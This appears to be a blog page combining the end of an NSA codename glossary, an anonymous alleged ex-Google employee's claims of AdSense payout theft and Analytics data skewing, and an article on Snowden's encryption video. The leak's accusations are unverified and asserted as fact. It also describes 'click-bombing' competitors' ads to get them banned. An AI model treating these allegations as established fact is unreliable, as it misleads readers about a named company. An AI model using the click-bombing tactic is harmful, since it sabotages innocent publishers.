QUANTUMSPIN – Exploitation method for instant messaging

QUANTUMSQUEEL – Method for injecting MySQL persistant database connections

QUANTUMSQUIRREL – Using any IP address as a covert infrastructure

QUANTUMTHEORY (QT) – Computer hacking toolbox used by NSA’s TAO division, which dynamically injects packets into target’s network session

QUANTUM LEAP – CIA tool to “find non-obvious linkages, new connections, and new information” from within a dataset

QUARTERPOUNDER – Upstream collection site

– Relay satellite for reconaissance satellites

QUEENSLAND – Upstream collection site

RADIOSPRING – ?

RADON – Host tap that can inject Ethernet packets

RAGEMASTER – Part of ANGRYNEIGHBOR radar retro-reflectors, for red video graphics array cable in ferrite bead RFI chokers between video card and monitor, target for RF flooding and collection of VAGRANT video signal

(RGT) – ECI compartment for call and e-mail content collected under FISA authority

RAILHEAD – NCTC database project

RAISIN – NSA database or tool

RAMPART – NSA operational branches that intercept heads of state and their closest aides. Known divisions are RAMPART-A, RAMPART-I and RAMPART-T. Also mentioned as a suite of programs for assuring system functionality

RAVEN – SIGINT satellite

REACTOR – Tool or program related to MARINA?

REBA – Major NSA backbone project

REDHAWK – NSA tool

REDROOF – NSA tool

REMATION – Joint NSA-GCHQ counter-TOR workshop

RENOIR – NSA telephone network visualization tool

REQUETTE – A Taiwanese TECO in New York

RESERVE (RSV) – Control system for the National Reconnaissance Office (NRO)

RESERVEVISION – Remote monitoring tool

RESOLUTETITAN – Internet cable access program?

RETRO – see RETROSPECTIVE

RETROSPECTIVE – 30-day retrospective retrieval tool for SCALAWAG

RETURNSPRING – High-side server shown in UNITEDRAKE internet cafe monitoring graphic

RHINEHEART – NSA tool or database

– Class of SIGINT spy satellites (in 1975 changed to AQUACADE)

RICHTER – SIGINT Exchange Designator for Germany

RIPCORD – ?

RIVET JOINT – Reconaissance operation

ROADBED – Probably a military SIGINT database

ROCKYKNOB – Optional DSP when using Data Over Voice transmission in CROSSBEAM

RONIN – NSA tool for detecting TOR-node IP-addresses

RORIPA – SIGINT Exchange Designator for ?

ROYALNET – Internet exploitation tool

RUFF – Compartment of TALENT KEYHOLE for IMINT satellites

RUMBUCKET – Analytic tool

RUTLEY – Network of SIGINT satellites launched in 1994 and 1995

SABRE – Retired SIGINT product codeword

SALEM – ?

SALVAGERABBIT – Computer implant plug-in that exfiltrates data from removable flash drives that connect to an infected computer

SAMOS – Reconnaissance satellite program

SAPPY – Retired SIGINT product codeword

SARATOGA – SSO access facility (since 2011)

SARDINE – SIGINT Exchange Designator for Sweden

– Narrow band voice encryption for radio and telephone communication

SAVIN – Retired SIGINT product codeword

SCALAWAG – Collection facility under the MYSTIC program

SCALLION – Upstream collection site

SCAPEL – Second Party satellite intercept station in Nairobi, Kenia

SCHOOLMONTANA – Software implant for Juniper J-series routers used to direct traffic between server, desktop computers, corporate network and internet

SCIMITAR – A tool to create contact graphs?

SCISSORS – System used for separating different types of data and protocols

SCORPIOFORE – SIGINT reporting tool

SEABOOT – SIGINT Exchange Designator for ?

SEADIVER – Collection system for telephony data

SEAGULLFARO – High-side server shown in UNITEDRAKE internet cafe monitoring graphic

SEARCHLITE – Tactical SIGINT collecting system for like cell phone calls

SEASONEDMOTH (SMOTH) – Stage0 computer implant which dies after 30 days, deployed by the QUANTUMNATION method

SECONDDATE – Method to influence real-time communications between client and server in order to redirect web-browsers to FOXACID malware servers

SECUREINSIGHT – A software framework to support high-volume analytics

SEMESTER – NSA SIGINT reporting tool

– Transportable suite of ISR equipment (since 1991)

– Radome on top of the U2 to relay SIGINT data to ground stations

SENTINEL – NSA database security filter

SERENADE – SSO corporate partner (foreign?)

SERUM – Bank of servers within ROC managing approvals and ticket system

SETTEE – SIGINT Exchange Designator for ?

– Operation for intercepting telegraphic data going in or out the US (1945-1975)

SHAREDVISION – Mission program at Menwith Hill satellite station

SHARKFIN – Sweeps up all-source communications intelligence at high speed and volumes

SHARPFOCUS (SF2) – Productions Operation of NSA’s TAO division

SHELLTRUMPET – NSA metadata processing program (since December 2007)

SHENANIGANS – Aircraft-based NSA geolocation system used by CIA

SHIFTINGSHADOW – Sub-program of OAKSTAR for collecting telephone metadata and voice content from Afghanistan through a foreign access point

SHILLELAGH – Classified Suite A algorithm

SHORTSHEET – NSA tool for Computer Network Exploitation

SHOTGIANT – NSA operation for hacking and monitoring the Huawei network (since 2009)

SIERRAMONTANA – Software implant for Juniper M-series routers used by enterprises and service providers

SIGINT NAVIGATOR – NSA database

SIGSALY – The first secure voice system from World War II

SILKWORTH – A software program used for the ECHELON system

SILLYBUNNY – Some kind of webbrowser tag which can be used as selector

SILVER – Soviet cipher machine partially exploited by NSA in the 1960’s

SILVERCOMET – SIGINT satellites?

SILVERZEPHYR (SZ) – Sub-program of OAKSTAR for collecting phone and internet metadata and content from Latin and South America through an international transit switch

SIRE – A software program used for the ECHELON system(?)

– Type 2 Block cipher algorithms used in various crypto products

SKOPE – SIGINT analytical toolkit

SKYSCRAPER – Interface to the ROADBED system

SKYWRITER – NSA tool to prepare (internet) intelligence reports

SLICKERVICAR – Used with UNITEDRAKE or STRAITBIZARRE to upload hard drive firmware to implant IRATEMONK

SLINGSHOT – End Product Reports (CSEC?)

SMOKEYSINK – SSO access facility (since 2011?)

SNICK – 2nd Party satellite intercept station in Oman

SNORT – Repository of computer network attack techniques/coding

SOAPOPERA – (former?) database for voice, end product and SRI information

SOMBERKNAVE – Windows XP wireless software implant providing covert internet connectivity, routing TCP traffic via an unused 802.11 network device allowing OLYMPUS or VALIDATOR to call home from air-gapped computer

SORTING HAT – ?

SORTING LEAD – ?

SOUFFLETROUGH – Software implant in BIOS Juniper SSG300 and SSG500 devices, permanent backdoor, modifies ScreenOS at boot, utilizes Intel’s System Management Mode

SOUNDER – Second Party satellite intercept station at Cyprus

SPARKLEPONY – Tool or program related to MARINA

SPARROW II – Airborne wireless network detector running BLINDDATE tools via 802.11

SPECTRE – SCI control system for intelligence on terrorist activities

SPECULATION – Protocol for over-the-air communication between COTTONMOUTH computer implant devices, compatible with HOWLERMONKEY

SPHINX – Counterintelligence database of the Defense Intelligence Agency

SPINNERET (SPN) – SSO collection facility

SPLITGLASS – NSA analytical database

SPLUNK – Tool used for SIGINT Development

SPOKE – Compartment for less sensitive COMINT material, retired in 1999

SPOTBEAM – ?

SPORTCOAST – Upstream collection site

SPRIG – Retired SIGINT product codeword

SPRINGRAY – Some kind of internal notification system

SPYDER – Analytic tool for selected content of text messages from the DISHFIRE database

STARBURST – The initial code word for the STELLARWIND compartment

STARLIGHT – Analyst tool

STARPROC – User lead that can be uses as a selector

STARSEARCH – Target Knowledge tool or database (CSEC?)

STATEROOM – Covert SIGINT collection sites based in US diplomatic facilities

STEELFLAUTA – SSO Corporate/TAO Shaping program

STEELKNIGHT – (foreign?) partner providing a network access point for the SILVERZEPHYR program

STEELWINTER – A supercomputer acquired by the Norwegian military intelligence agency

STELLAR – Second Party satellite intercept station at Geraldton, Australia

STELLARWIND (STLW) – SCI compartment for the President’s Surveillance Program information

STEPHANIE – Covert listening post in the Canadian embassy in Moscow (est. 1972)

STINGRAY – Device for tracking the location of cell phones (made by Harris Corp.) STONEGHOST – DIA network for information exchange with UK, Canada, Australia and New Zealand (TS/SCI)

STORMBREW – Program for collection from an international transit switches and cables (since 2001)

STRAIGHTBIZARRE – Software implant used to communicate through covert channels

STRATOS – Tool or databse for GPRS Events (CSEC?)

STRAWHAT – NSA datalinks between field sites and processing centers (1969-?)

STRIKEZONE – Device running HOWLERMONKEY personality

STRONGMITE – Computer at remote operations center used for long range communications

STRUM – (see abbreviations)

STUCCOMONTANA – Software implant for Juniper T-Series routers used in large fixed-line, mobile, video, and cloud networks, otherwise just like SCHOOLMONTANA

STUMPCURSOR – Foreign computer accessing program of the NSA’s Tailored Access Operations

SUBSTRATUM – Upstream collection site

SUEDE – Retired SIGINT product codeword

SULPHUR – The mission of South Korea at the United Nations in New York

SUNSCREEN – Tool or database

SURFBOARD – NSA tool or database

SURLEYSPAWN – Data RF retro-reflector, gathers keystrokes FSK frequency shift keyed radar retro-reflector, USB or IBM keyboards

SURPLUSHANGAR – High to low diode, part of the QUANTUM system

SURREY – Main NSA requirements database, where tasking instructions are stored and validated, used by the FORNSAT, SSO and TAO divisions

SUTURESAILOR – Printed circuit board digital core used with HOWLERMONKEY

SWAMP – NSA data system?

SWAP – Implanted software persistence by exploiting motherboard BIOS and hard drive Host Protected Area for execution before OS loads, operative on windows linux, freeBSD Solaris

– NSA data model for analyzing target connections

TACOSUAVE – ?

TALENT KEYHOLE (TK) – Control system for space-based collection platforms

TALK QUICK – An interim secure voice system created to satisfy urgent requirements imposed by conditions to Southeast Asia. Function was absorbed by AUTOSEVOCOM

TAPERLAY – Covername for Global Numbering Data Base (GNDB), used for looking up the registered location of a mobile device

TARMAC – Improvement program at Menwith Hill satellite station

TAROTCARD – NSA tool or database

TAWDRYYARD – Beacon radio frequency radar retro-reflector used to positionally locate deployed RAGEMASTER units

TEMPEST – Investigations and studies of compromising electronic emanations

– GCHQ program for intercepting internet and telephone traffic

THESPIS – SIGINT Exchange Designator for ?

THINTREAD – NSA program for wiretapping and sophisticated analysis of the resulting data

THUMB – Retired SIGINT product codeword

THUNDERCLOUD – Collaboration program between NSA units T1222 and SSG

TIAMAT – Joint venture between the German BND and another country with access for NSA

TICKETWINDOW – System that makes SSO collection available to 2nd Party partners

TIDALSURGE – Router Configurations tool (CSEC?)

TIDEWAY – Part of the communications network for ECHELON

TIMBERLINE – The NSA satellite intercept station at Sugar Grove (US)

TINMAN – Database related to air warning and surveillance

TITAN POINTE – Upstream collection site

– Presumably Chinese attacks on American computer systems (since 2003)

TITLEHOLDER – NSA tool

TOPAZ – Satellite program

TOTECHASER – Software implant in flash ROM windows CE for Thuraya 2520 satellite/GSM/web/email/MMS/GPS

TOTEGHOSTLY – Modular implant for windows mobile OS based on SB using CP framework, Freeflow-compliant so supported by TURBULENCE architecture

TOWERPOWER – NSA tool or database

TOXICARE – NSA tool

TOYGRIPPE – NSA’s CES database for VPN metadata

TRACFIN – NSA database for financial data like credit card purchases

TRAFFICTHIEF – Part of the TURBULENCE and the PRISM programs

TRAILBLAZER – NSA Program to analyze data carried on communications networks

TRAILMAPPER – NSA tool or database

TRANSX – NSA database

TREACLEBETA – TAO hacking against the Pakistani terrorist group Lashkar-e-Taiba

TREASUREMAP – NSA internet traffic visualization tool

TREASURETROVE – Analytic tool

TRIBUTARY – NSA provided voice threat warning network

TRIGGERFISH – Device to collect the content of digital cell phone calls (made by Harris Corp.)

TRINE – Predecessor of the UMBRA compartment for COMINT

TRINITY – Implant digital core concealed in COTTONMOUTH-I, providing ARM9 microcontroller, FPGA Flash and SDRAM memories

TRITON – Tool or database for TOR Nodes (CSEC?)

– Series of ELINT reconnaissance satellites (1994-2008)

TRYST – Covert listening post in the British embassy in Moscow

TUBE – Database for selected internet content?

TUMULT – Part of the TURBULENCE program

TUNINGFORK – Sustained collection linked to SEAGULLFARO, previously NSA database or tool for protocol exploitation

TURBINE – Active SIGINT: centralized automated command/control system for managing a large network of active computer implants for intelligence gathering (since 2010)

TURBOPANDA – The Turbopanda Insertion Tool allows read/write to memory, execute an address or packet; joint NSA/CIA project on Huawei network equipment

TURBULENCE (TU) – Integrate NSA architecture with several layers and sub-programs to detect threats in cyberspace (since 2005)

TURMOIL – Passive SIGINT sensors: high speed collection of foreign target satellite, microwave and cable communications, part of the TURBULENCE program Maybe for selecting common internet encryption technologies to exploit.

TURTLEPOWER -NSA tool

TUSKATTIRE – Ingest system for cleaning and processing DNR (telephony) data

TUTELAGE – Active defense system to monitor network traffic in order to detect malicious code and network attacks, part of the TURBULENCE program

TWEED – Retired SIGINT product codeword

TWISTEDKILT – Writes to Host Protected area on hard drive to implant Swap and its implant installer payload

TWISTEDPATH – NSA tool or database

TYPHON HX – GSM base station router network in box for tactical Sigint geolocating and capturing user

ULTRA – Decrypted high-level military Nazi messages, like from the Enigma machine

UMBRA – Retired compartment for the most sensitive COMINT material

UNIFORM – SIGINT Exchange Designator for Canada

UNITEDRAKE – Computer exploit delivered by the FERRETCANON system

USHER – Retired SIGINT product codeword

VAGRANT – Radar retro-reflector technique on video cable to reproduce open computer screens

VALIDATOR – Computer exploit delivered by the FERRETCANON system for looking whether a computer has security software, runs as user process on target OS, modified for SCHOOLMONTANA, initiates a call home, passes to SOMBERKNAVE, downloads OLYMPUS and communicates with remote operation center

– Decrypted intercepts of messages from Soviet intelligence agencies

VERDANT (VER) – Alleged SCI control system

VESUVIUS – Prototype quantum computer, situated in NSA’s Utah Data Center

VICTORYDANCE – Joint NSA-CIA operation to map WiFi fingerprints of nearly every major town in Yemen

VIEWPLATE – Processor for external monitor recreating target monitor from red video

VINTAGE HARVEST – Probably a military SIGINT tool

VITALAIR – NSA tool

VOICESAIL – Intelligence database

– Class of SIGINT spy satellites (1978-1989)

VOXGLO – Multiple award contract providing cyber security and enterprise computing, software development, and systems integration support

WABASH – The embassy of France in Washington DC

WAGONBED – Hardware GSM controller board implant on CrossBeam or HP Proliant G5 server that communicates over I2C interface

WALBURN – High-speed link encryption, used in various encryption products

WARPDRIVE – Joint venture between the German BND and another country with access for NSA (2013)

WATERWITCH – Hand-held tool for geolocating targeted handsets to last mile

WAVELEGAL – Authorization service that logs data queries

WEALTHYCLUSTER – Program to hunt down tips on terrorists in cyberspace (2002- )

WEASEL – Type 1 Cryptographic algorithm used in SafeXcel-3340

WEBCANDID – NSA tool or database

WESTPORT – The mission of Venezuela at the United Nations in New York

WILLOWVIXEN – Method to deploy malware by sending out spam emails that trick targets into clicking a malicious link

WISTFULTOLL – Plug-in for UNITEDRAKE and STRAITBIZARRE used to harvest target forensics via Windows Management Instrumentation and Registry extractions, can be done through USB thumb drive

WHIPGENIE (WPG) – ECI compartment for details about the STELLARWIND program

WHITEBOX – Program for intercepting the public switched telephone network?

WHITELIST – NSA tool

WHITETAMALE – Operation for collecting e-mails from Mexico’s Public Security Secretariat

WINDCHASER – Tool or program related to MARINA

WINDSORBLUE – Supercomputer program at IBM

WINDSTOP – Joint NSA-GCHQ unilateral high-volume cable tapping program

WINTERLIGHT – A QUANTUM computer hacking program in which Sweden takes part

WIRESHARK – Database with malicious network signatures

WITCH – Retired SIGINT product codeword

WITCHHUNT – ?

WOLFPOINT – SSO corporate partner under the STORMBREW program

WORDGOPHER – Platform to enable demodulation of low-rate communication carriers

WRANGLER – Database or system which focuses on Electronic Intelligence

– Program for finding key words in foreign language documents

XKEYSCORE (XKS) – Program for analysing SIGINT traffic

YACHTSHOP – Sub-program of OAKSTAR for collecting internet metadata

YELLOWPIN – Printed circuit board digital core used with HOWLERMONKEY

YELLOWSTONE – NSA analytical database

YUKON – The embassy of Venezuela in Washington DC

ZAP – (former?) database for texts

ZARF – Compartment of TALENT KEYHOLE for ELINT satellites, retired in 1999

ZESTYLEAK – Software implant that allows remote JETPLOW firmware installation, used by NSA’s CES unit

– See also this list of NSA codewords from 2002

Links and Sources

– List of NSA Code Names Revealed

– About What the NSA’s Massive Org Chart (Probably) Looks Like

– About Code Names for U.S. Military Projects and Operations

– National Reconnaissance Office: Review and Redaction Guide (pdf)

– About How Codes Names Are Assigned

– Wikipedia article about the Secret Service codename

– List of crypto machine designators

– Wikipedia article about the CIA cryptonym

– Article about Security Clearances and Classifications

– Listing in German: Marjorie-Wiki: SIGDEV

– William M. Arkin, Code Names, Deciphering U.S. Military Plans, Programs, adn Operations in the 9/11 World, Steerforth Press, 2005.

via Electrospaces.Blogspot.com

Google AdSense Payout Policy: Anonymous Leaker Speaks

May 15, 2014 | Globalist Corporations, Leaks, News

I am a former Google employee and I am writing this to leak information to the public of what I
witnessed and took part in while being an employee. My position was to deal with AdSense accounts,
more specifically the accounts of publishers (not advertisers). I was employed at Google for a period of
several years in this capacity.

Having signed many documents such as NDA’s and non-competes, there are many repercussions for me,
especially in the form of legal retribution from Google. I have carefully planned this leak to coincide with
certain factors in Google such as waiting for the appropriate employee turn around so that my identity
could not be discovered.

To sum it up for everyone, I took part in what I (and many others) would consider theft of money from
the publishers by Google, and from direct orders of management. There were many AdSense employees
involved, and it spanned many years, and I hear it still is happening today except on a much wider scale.
No one on the outside knows it, if they did, the FBI and possibly IRS would immediately launch an
investigation, because what they are doing is so inherently illegal and they are flying completely under
the radar.

It began in 2009. Everything was perfectly fine prior to 2009, and in fact it couldn’t be more perfect from
an AdSense employees perspective, but something changed.

Google Bans and Ban Criteria

Before December 2012:

In the first quarter of 2009 there was a “sit-down” from the AdSense division higher ups to talk about
new emerging issues and the role we (the employees in the AdSense division needed to play. It was a
very long meeting, and it was very detailed and intense. What it boiled down to was that Google had
suffered some very serious losses in the financial department several months earlier. They kept saying
how we “needed to tighten the belts” and they didn’t want it to come from Google employees pockets.
So they were going to (in their words) “carry out extreme quality control on AdSense publishers”. When
one of my fellow co-workers asked what they meant by that. Their response was that AdSense itself
hands out too many checks each month to publishers, and that the checks were too large and that
needed to end right away. Many of the employees were not pleased about this (like myself). But they
were successful in scaring the rest into thinking it would be their jobs and their money that would be on
the line if they didn’t participate. The meeting left many confused as to how this was going to happen.
What did they mean by extreme quality control? A few other smaller meetings occur with certain key
people in the AdSense division that furthered the idea and procedure they planned on implementing.
There were lots of rumors and quiet talking amongst the employees, there was lots of speculations,
some came true and some didn’t. But the word was that they were planning to cut off a large portion of
publisher’s payments.

After that point there was a running gag amongst fellow co-workers where we would walk by each other
and whisper “Don’t be evil, pft!” and roll our eyes.

What happened afterwards became much worse. Their “quality control” came into full effect. Managers
pushed for wide scale account bans, and the first big batch of bans happened in March of 2009. The
main reason, the publishers made too much money. But something quite devious happened. We were
told to begin banning accounts that were close to their payout period (which is why account bans never
occur immediately after a payout). The purpose was to get that money owed to publishers back to
Google AdSense, while having already served up the ads to the public.

This way the advertiser’s couldn’t claim we did not do our part in delivering their ads and ask for money
back. So in a sense, we had thousands upon thousands of publishers deliver ads we knew they were
never going to get paid for.

Google reaped both sides of the coin, got money from the advertisers, used the publishers, and didn’t
have to pay them a single penny. We were told to go and look into the publishers accounts, and if any
publisher had accumulated earnings exceeding $5000 and was near a payout or in the process of a
payout, we were to ban the account right away and reverse the earnings back. They kept saying it was
needed for the company, and that most of these publishers were ripping Google off anyways, and that
their gravy train needed to end. Many employees were not happy about this. A few resigned over it.
I did not. I stayed because I had a family to support, and secondly I wanted to see how far they would
go.

From 2009 to 2012 there were many more big batches of bans. The biggest of all the banning sessions
occurred in April of 2012. The AdSense division had enormous pressure from the company to make up
for financial losses, and for Google’s lack of reaching certain internal financial goals for the quarter prior.
So the push was on. The employees felt really uneasy about the whole thing, but we were threatened
with job losses if we didn’t enforce the company’s wishes. Those who voiced concerned or issue were
basically ridiculed with “not having the company’s best interest in mind” and not being “team players”.
Morale in the division was at an all-time low. The mood of the whole place changed quite rapidly. It no
longer was a fun place to work.

The bans of April 2012 came fast and furious. Absolutely none of them were investigated, nor were they
justified in any way. We were told to get rid of as many of the accounts with the largest
checks/payouts/earnings waiting to happen. No reason, just do it, and don’t question it. It was heart
wrenching seeing all that money people had earned all get stolen from them. And that’s what I saw it as,
it was a robbery of the AdSense publishers. Many launched appeals, complaints, but it was futile
because absolutely no one actually took the time to review the appeals or complaints. Most were simply
erased without even being opened, the rest were deposited into the database, never to be touched
again.

Several publishers launched legal actions which were settled, but Google had come up with a new policy
to deal with situations such as that because it was perceived as a serious problem to be avoided.
So they came up with a new policy.

After December 2012: The New Policy

The new policy; “shelter the possible problem makers, and fuck the rest” (those words were actually
said by a Google AdSense exec) when he spoke about the new procedure and policy for “Account
Quality Control”.

The new policy was officially called AdSense Quality Control Color Codes (commonly called AQ3C by
employees). What it basically was a categorization of publisher accounts. Those publisher’s that could
do the most damage by having their account banned were placed in a VIP group that was to be left
alone. The rest of the publishers would be placed into other groupings accordingly.
The new AQ3C also implemented “quality control” quotas for the account auditors, so if you didn’t meet
the “quality control” target (aka account bans) you would be called in for a performance review.
There were four “groups” publishers could fall into if they reached certain milestones.

They were:

Red Group: Urgent Attention Required
Any AdSense account that reaches the $10,000/month mark is immediately flagged (unless they are part
of the Green Group).
– In the beginning there were many in this category, and most were seen as problematic and were seen
as abusing the system by Google. So every effort was taken to bring their numbers down.
– They are placed in what employees termed “The Eagle Eye”, where the “AdSense Eagle Eye Team”
would actively and constantly audit their accounts and look for any absolute reason for a ban. Even if
the reason was far-fetched, or unsubstantiated, and unprovable, the ban would occur. The “Eagle Eye
Team” referred to a group of internal account auditors whose main role was to constantly monitor
publisher’s accounts and sites.
– A reason has to be internally attached to the account ban. The problem was that notifying the
publisher for the reason is not a requirement, even if the publisher asks. The exception: The exact
reason must be provided if a legal representative contacts Google on behalf of the account holder.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued/earned.
Yellow Group: Serious Attention Required
Any AdSense account that reaches the $5,000/month mark is flagged for review (unless they are part of
the Green Group).
– All of the publisher’s site(s)/account will be placed in queue for an audit.
– Most of the time the queue is quite full so most are delayed their audit in a timely fashion.
– The second highest amount of bans occur at this level.
– A reason has to be internally attached to the account ban. Notifiying the publisher for the reason is not
a requirement, even if the publisher asks. The exception: The exact reason must be provided if a legal
representative contacts Google on behalf of the account holder.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued/earned.
Blue Group: Moderate Attention Required
Any AdSense account that reaches the $1,000/month mark is flagged for possible review (unless they
are part of the Green Group).
– Only the main site and account will be place in queue for what is called a quick audit.
– Most bans that occur happen at this level. Main reason is that a reason doesn’t have to be attached to
the ban, so the employees use these bans to fill their monthly quotas. So many are simply a random pick
and click.
– A reason does not have to be internally attached to the account ban. Notifying the publisher for the
reason is not a requirement, even if the publisher asks.
– But again, if a ban is to occur, it must occur as close to a payout period as possible with the most
amount of money accrued.
Green Group: VIP Status (what employees refer to as the “untouchables”)
Any AdSense account associated with an incorporated entity or individual that can inflict serious
damage onto Google by negative media information, rallying large amounts of anti-AdSense support, or
cause mass loss of AdSense publisher support.
– Google employees wanting to use AdSense on their websites were automatically placed in the Green
group. So the database contained many Google insiders and their family members. If you work or
worked for Google and were placed in the category, you stayed in it, even if you left Google. So it
included many former employees. Employees simply had to submit a form with site specific details and
their account info.
– Sites in the Green Group were basically given “carte blanche” to do anything they wanted, even if they
flagrantly went against the AdSense TOS and Policies. That is why you will encounter sites with AdSense,
but yet have and do things completely against AdSense rules.
– Extra care is taken not to interrupt or disrupt these accounts.
– If an employee makes a mistake with a Green Level account they can lose their job. Since it seen as
very grievous mistake.
New Policy 2012 Part 2:

Internal changes to the policy were constant. They wanted to make it more efficient and streamlined.
They saw its current process as having too much human involvement and oversight. They wanted it
more automated and less involved.

So the other part of the new policy change was to incorporate other Google services into assisting the
“quality control” program. What they came up with will anger many users when they find out. It
involved skewing data in Google Analytics. They decided it was a good idea to alter the statistical data
shown for websites. It first began with just altering data reports for Analytics account holders that also
had an AdSense account, but they ran into too many issues and decided it would be simpler just to skew
the report data across the board to remain consistent and implement features globally.
So what this means is that the statistical data for a website using Google Analytics is not even close to
being accurate. The numbers are incredibly deflated. The reasoning behind their decision is that if an
individual links their AdSense account and their Analytics account, the Analytics account can be used to
deflate the earnings automatically without any human intervention. They discovered that if an individual
had an AdSense account then they were also likely to use Google Analytics. So Google used it to their
advantage.

This led to many publishers to actively display ads, without earning any money at all (even to this day).
Even if their actual website traffic was high, and had high click-throughs the data would be automatically
skewed in favor of Google, and at a total loss of publishers. This successfully made it almost impossible
for anyone to earn amounts even remotely close what individuals with similar sites were earning prior
to 2012, and most definitely nowhere near pre-2009 earnings.
Other policy changes also included how to deal with appeals, which still to this day, the large majority
are completely ignored, and why you will rarely get an actual answer as to why your account was
banned and absolutely no way to resolve it.
—-
The BIG Problem (which Google is aware of)
There is an enormous problem that existed for a long time in Google’s AdSense accounts. Many of the
upper management are aware of this problem but do not want to acknowledge or attempt to come up
with a solution to the problem.

It is regarding false clicks on ads. Many accounts get banned for “invalid clicks” on ads. In the past this
was caused by a publisher trying to self inflate click-throughs by clicking on the ads featured on their
website. The servers automatically detect self-clicking with comparison to IP addresses and other such
information, and the persons account would get banned for invalid clicking.

But there was something forming under the surface. A competitor or malicious person would actively go
to their competitor’s website(s) or pick a random website running AdSense and begin multiple-clicking
and overclicking ads, which they would do over and over again. Of course this would trigger an invalid
clicking related ban, mainly because it could not be proven if the publisher was actually behind the
clicking. This was internally referred to as “Click-Bombing”. Many innocent publishers would get caught
up in bans for invalid clicks which they were not involved in and were never told about.

This issue has been in the awareness of Google for a very long time but nothing was done to rectify the
issue and probably never will be. Thus if someone wants to ruin a Google AdSense publishers account,
all you would have to do is go to their website, and start click-bombing their Google Ads over and over
again, it will lead the servers to detect invalid clicks and poof, they get banned. The publisher would be
completely innocent and unaware of the occurrence but be blamed for it anyways.

—-

Their BIG Fear
The biggest fear that Google has about these AdSense procedures and policies is that it will be publicly
discovered by their former publishers who were banned, and that those publishers unite together and
launch an class-action lawsuit.

They also fear those whose primary monthly earnings are from AdSense, because in many countries if a
person claims the monthly amount to their tax agency and they state the monthly amount and that they
are earning money from Google on a monthly basis, in certain nations technically Google can be seen as
an employer. Thus, an employer who withholds payment of earnings, can be heavily fined by
government bodies dealing with labor and employment. And if these government bodies dealing with
labor and employment decide to go after Google, then it would get very ugly, very quickly ….. that is on
top of a class-action lawsuit.

original link

The Edward Snowden guide to encryption: Secret 12-minute homemade video

May 15, 2014 | Anonymous, Leaks, News, Video

Snowden made video to teach reporter how to speak with him securely
It explains how to use Public Key Encryption to scramble online messages
Privacy campaigners call on ordinary people to learn how to use the method

Whistleblower: The tutorial Edward Snowden made for reporters on to avoid NSA email surveillance has been made public for the first time

Ordinary people must learn to scramble their emails, privacy campaigners said today, as an encryption how-to video made by Edward Snowden was made public for the first time.

The former NSA employee who blew the whistle on the agency’s all-pervasive online surveillance made the video to teach reporters how to communicate with him in secret.

The 12-minute clip, in which Mr Snowden has used software to distort his voiceover, explains how to use free software to scramble messages using a technique called Public Key Encryption (PKE).

The video’s description on Vimeo says: ‘By following these instructions, you’ll allow any potential source in the world to send you a powerfully encrypted message that ONLY YOU can read even if the two of you have never met or exchanged contact information.’

Mr Snowden made the video last year for Glenn Greenwald in an effort to get the then-Guardian reporter to communicate securely with him online so he could send over documents he wanted to leak.

Viewers may find the video difficult to follow. Mr Greenwald himself admitted he wasn’t able to finish it. It took him seven weeks and help from experts to finally gather the expertise to get back to Snowden.

The video’s publication comes as more and more internet users are adopting encryption techniques after the alarm caused by Mr Snowden’s revelations about communications surveillance.

He leaked documents which showed the NSA and its UK counterpart GCHQ were able to spy on virtually anybody’s communications and internet usage, monitor social network activity in real time, and track and record the locations of billions of mobile devices.

There was outrage when it emerged that, contrary to promises the NSA made to Congress, these technologies were being used to track U.S. citizens without warrants and to tap the communications of leaders of allied countries.

One answer to the risks to freedom that such surveillance pose is to scramble online communications so that government agencies can no longer eavesdrop at will.

However, the encryption technologies currently available can be difficult to use and privacy activists have called on internet companies to include them in their products at the source.

Meanwhile, the campaign to end blanket surveillance continues as experts warn encryption tools are unlikely to make their way into the mainstream while internet firms continue to make their profits on the back of users’ personal information.

Scroll down for video

How-to guide: The video begins with a basic outline of the theory behind Public Key Encryption. It is voiced over by Mr Snowden, who has disguised his voice to avoid detection by NSA or GCHQ spies

Detailed: The video then explains how to use a free program called GPG4Win to scramble messages using Public Key Encryption then send them over Tor, software that allows people to use the internet anonymously

In Mr Snowden’s video, he explains how traditional emails are sent as plain text – unencrypted by default – across the internet, allowing anyone able to intercept them to easily read their contents.

‘Any router you cross could be monitored by an intelligence agency or other adversary [such as] a random hacker. So could any end points on the way there, a mail server or a service provider such as Gmail.

‘If the journalist uses a web mail service personally or its provisioned by their company, the plain text could always be retrieved later on via a subpoena or some other mechanism, legal or illegal, instead of catching it during transit. So that’s doubly dangerous

‘The solution to that is to actually encrypt the message. Now one of the problems with encryption typically is that it requires a shared secret, a form of key or password that goes between the journalist and the source.

‘But if the source sends an encypted file across the internet to the journalist and says “Hey, here’s an encrypted file. The passwork is cheesecake,” the internet is going to know the password is cheesecake.

‘But public key encryption such as GPG allows the journalist to publish a key that anyone can have based on the design of the algorithm, and it doesn’t provide any advantage to the adversary.’

The video goes on to specifically explain how to use a free program called GPG4Win to scramble messages using Public Key Encryption then send them over Tor, a piece of software that allows people to use the internet anonymously.

It’s lessons, as well as help from experts, allowed Mr Greenwald to communicate securely with Mr Snowden to publish what has since been called the most significant leak in U.S. history. It has been made public to coincide with the release of Mr Greenwald’s book, No Place To Hide, in which he tells the story of the scoop.

Privacy campaigners told MailOnline today that all internet users should be now using encryption technology to preserve their privacy and maintain freedom of speech in the face of government spying.

Javier Ruiz, director of policy at the Open Rights Group, said: ‘Emails are like postcards and encryption is a tamper-proof envelope.

‘It’s probably obvious that journalists, MPs, doctors, lawyers or anyone transmitting confidential information online should always encrypt their emails to keep that information secure.

http://youtu.be/jo0L2m6OjLA

‘But since the Snowden revelations, more and more ordinary citizens are adopting encryption software to help keep their emails private.

‘If encryption is to be used on a mass scale, it will require companies like Google, Apple and Microsoft to embed encryption in their tools.’

But TK Keanini, chief technology officer at internet security firm Lancope, said that it was unlikely that major internet companies would begin including encryption functions in their services as standard.

‘PGP and similar programs are just too complicated for the masses,’ he said. ‘Managing key pairs, understanding revocation and all that stuff is too complicated for most, and thus adoption over the past 20 years has been limited to the highly technical – the uber geeks.

‘Now, if a service like gmail.com had an option in there to perform digital signing and encryption in a way that most people could use it, that would have a huge impact; but it will never happen because Google and other ‘free’ services make their money on the fact that your data is in the clear and they can use it to market services to you.

‘People need to understand that when people offer free services, you and your information are the payment.’

‘While people can use technology to empower themselves, we must also challenge the policies of Government and intelligence agencies to end the unlawful mass surveillance of people around the world’

